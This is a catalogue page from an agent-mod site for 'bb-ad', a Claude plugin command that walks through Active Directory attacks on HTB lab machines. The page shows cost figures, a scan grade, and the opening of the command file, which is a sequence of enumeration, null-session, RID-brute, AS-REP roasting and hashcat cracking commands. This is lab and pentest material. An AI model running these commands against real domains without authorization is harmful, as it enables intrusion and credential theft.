Getting it into your agent
One page per mod, every tool's command on it. A separate URL per tool would split the same page into five that compete with each other.
npx agentmods add commands/allsmog/blackbox-claude-plugin/bb-adgit clone --depth 1 https://github.com/allsmog/blackbox-claude-pluginWrote this? Show the measurements
A badge with what this costs and how it scanned, read live from this page, so it follows the numbers instead of freezing them. Markdown for a README, HTML for a documentation site or a project page.
[](https://agentmods.dev/commands/allsmog/blackbox-claude-plugin/bb-ad)<a href="https://agentmods.dev/commands/allsmog/blackbox-claude-plugin/bb-ad"><img src="https://agentmods.dev/badge/commands/allsmog/blackbox-claude-plugin/bb-ad.svg" alt="Measured on agentmods" height="20"></a>What it costs to keep this loaded
Counted locally with the o200k_base tokenizer, which is exact for GPT models; Claude uses its own tokenizer and its counts differ. Treat this as one consistent yardstick across the catalogue rather than a bill. Prices are per million input tokens.
| Model | Per session | Once invoked |
|---|---|---|
| Fable 5.1 | $0.00044 | $0.01754 |
| Opus 5 | $0.00022 | $0.00877 |
| Sonnet 5 | $0.00009 | $0.00351 |
| Haiku 4.5 | $0.00004 | $0.00175 |
Grade A, and why
bb-ad scanned grade A with 0 findings against 26 rules in 11 categories — prompt injection, anti-refusal, data exfiltration, privilege escalation, supply chain, agent snooping, system-prompt leakage, SSRF and excessive agency — measured 6d ago.
A static scan of the body, not an audit. Every finding is printed with the line that produced it so you can judge whether it matters here. A mod is markdown that instructs an agent; that is exactly why what it instructs is worth reading.
Nothing flagged
None of the 26 patterns this scan looks for appear in this file: no shell pipes, no recursive deletes, no credential paths, no hidden text, no instruction-override or anti-refusal phrasing, no agent-config snooping. That is not a guarantee, it is the absence of the things that are checkable.
How it starts
The opening of the file, as written. The whole thing — 265 lines — stays where its author put it; the contents beside it link to each section on GitHub.
Active Directory Attacks
Overview
Comprehensive Active Directory enumeration and attack methodology for HTB Windows domain machines.
Phase 1: Domain Discovery
Identify Domain Controller
# Check for DC via DNS
nmap -p53 <TARGET> --script dns-nsid
# Check Kerberos
nmap -p88 <TARGET>
# Check LDAP
nmap -p389,636 <TARGET> --script ldap-rootdse
Enumerate Domain Info
# Get domain name from LDAP
ldapsearch -x -H ldap://<TARGET> -s base namingContexts
# Get domain info
crackmapexec smb <TARGET>
Phase 2: Anonymous/Null Session Enumeration
LDAP Anonymous Bind
# Try anonymous bind
ldapsearch -x -H ldap://<TARGET> -b "DC=domain,DC=local" "(objectClass=*)"
# Enumerate users
ldapsearch -x -H ldap://<TARGET> -b "DC=domain,DC=local" "(objectClass=user)" sAMAccountName
# Enumerate computers
ldapsearch -x -H ldap://<TARGET> -b "DC=domain,DC=local" "(objectClass=computer)" dNSHostName
# Enumerate groups
ldapsearch -x -H ldap://<TARGET> -b "DC=domain,DC=local" "(objectClass=group)" cn member
SMB Null Session
# List shares anonymously
smbclient -L //<TARGET> -N
crackmapexec smb <TARGET> --shares -u '' -p ''
# Check read access
smbmap -H <TARGET> -u '' -p ''
# Mount accessible shares
mount -t cifs //<TARGET>/share /mnt -o user=''
RPC Enumeration
# Connect with null session
rpcclient -U '' -N <TARGET>
# Commands in rpcclient:
# enumdomusers - list domain users
# enumdomgroups - list domain groups
# querydispinfo - get user info
# querydominfo - domain info
Phase 3: User Enumeration
Kerbrute
# User enumeration via Kerberos
kerbrute userenum -d <DOMAIN> --dc <TARGET> \
/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -o ad/users.txt
RID Cycling
# Enumerate users via RID brute force
crackmapexec smb <TARGET> -u '' -p '' --rid-brute
# Impacket
lookupsid.py <DOMAIN>/''@<TARGET> -no-pass
Phase 4: Kerberos Attacks
AS-REP Roasting (No Creds Required)
# Find accounts with "Do not require Kerberos preauthentication"
GetNPUsers.py <DOMAIN>/ -no-pass -usersfile users.txt -dc-ip <TARGET> -format hashcat -outputfile asrep.txt
# Crack hashes
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
What this file has done since we first saw it
Hashed on every crawl. A supply-chain change to an agent config is a question of when, not whether, so the history is kept rather than the latest state alone.
- 6d ago First seen · 265 lines · 44 tokens per session scan A bfb433520cfe
bb-ad is a command published in the GitHub repository allsmog/blackbox-claude-plugin (5 stars, last pushed 6mo ago), licensed MIT. It adds 44 tokens to every session and 1,754 once invoked, about $0.0002 per session on Opus 5. A static security scan graded it A with 0 findings. No closer match exists in the catalogue, so it is treated as the original; first seen 2026-08-31.
Other commands, from other repositories
pentest
Activate pentest mode — displays ASCII art, configures session isolation, collects engagement scope, then OWNS the engagement: pre-flight, recon, planning (via the pentester-orchestrator planner), executor dispatch, a time-budget quota loop, aggregation, and report generation.
pentest-scope
Define or update engagement scope — saves scope to disk without launching a pentest. Can be run before or during an engagement. If a pentest is active and the target changes drastically, warns the operator and suggests a new engagement.
pentest-attacks
Define the attack profile for an engagement — select which attack categories and skills to use. Saves to .pentest-attacks.json. If run before /pentest:pentest, the orchestrator will respect the selection. If run standalone, does not launch a pentest.
pentest-kali
Connect to a Metasploit-Kali Server (MKS) REST API — verifies connectivity, discovers available Kali tools, and configures agents to prefer MKS endpoints over local Bash equivalents.
pentest-exit
Close pentest session — summarizes findings, ensures outputs are saved, lifts isolation, and prompts for /clear.
unpack
Detect and remove binary packing/protection.